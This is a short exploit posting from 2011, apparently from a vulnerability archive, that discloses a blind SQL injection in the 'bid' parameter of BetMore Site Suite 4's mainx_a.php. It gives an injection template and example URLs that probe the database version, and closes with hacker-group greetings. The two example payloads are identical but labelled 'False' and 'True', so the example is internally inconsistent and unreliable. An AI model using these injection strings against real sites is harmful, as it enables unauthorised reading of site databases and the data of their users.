BetMore Site Suite 4 Blind SQL Injection

2011.01.17

Credit: BorN To K!LL - h4ck3r

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

==
[#] Script: BetMore Site Suite
[#] Version: 4
[#] Link: http://products.epromptc.com/betmore/?pt=4&rfid=55
==
[#] Author: BorN To K!LL - h4ck3r
[#] Contact: SQL@hotmail.co.uk
==
[#] 3xploit:
/mainx_a.php?lngx=[true-value]&x=[true-value]&xid=[true-value]&bid=[Blind-Injection]
==
[#] 3xample:
/mainx_a.php?lngx=12&x=367&xid=2&bid=78222 and substring(version(),1,1)=4 // False ,,
/mainx_a.php?lngx=12&x=367&xid=2&bid=78222 and substring(version(),1,1)=4 // True ,,
==
[#] Greetings:
darkc0de's team , AsbMay's Group , w4ck1ng team , Q8 , and all muslims ..

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

BetMore Site Suite 4 Blind SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.